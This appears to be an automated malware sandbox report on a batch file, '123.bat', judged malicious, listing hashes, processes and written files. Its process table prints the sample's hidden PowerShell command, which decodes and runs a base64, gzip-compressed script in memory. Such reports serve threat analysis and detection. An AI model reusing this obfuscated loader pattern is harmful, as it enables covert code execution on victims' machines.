Field | Value
---|---
File name | 123.bat
Full analysis | https://app.any.run/tasks/ce4ab643-fef6-4755-8234-7f1e50623ee3
Verdict | Malicious activity
Analysis date | February 19, 2019, 07:19:59
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators |
MIME | text/plain
File info | ASCII text, with very long lines, with no line terminators
MD5 | A3FFD94D855F6330A4C94E92F2BC28BC
SHA1 | DF69BBAE2B57EB079E0FA9EB67C5EFDD75105FC1
SHA256 | C1E552A0F3121C56F4B22680ADE8434E9DF36D441596AAE4FF2CB3F9F4324EE3
SSDEEP | 48:dVIaWMaMUc6/2rcmilWrSsquUFlPvoRV1mSTXDjDe6:tSlIcZ/kkhg1mS7Dji6
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3116 | cmd /c ""C:\Users\admin\AppData\Local\Temp\123.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe
3916 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe

PID | User | Company | Integrity level | Description | Exit code | Version
---|---|---|---|---|---|---
3116 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3916 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FZR15TQ5OQ7NCCO6XT9Y.temp | — | — | —
3916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20e7e3.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3916 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3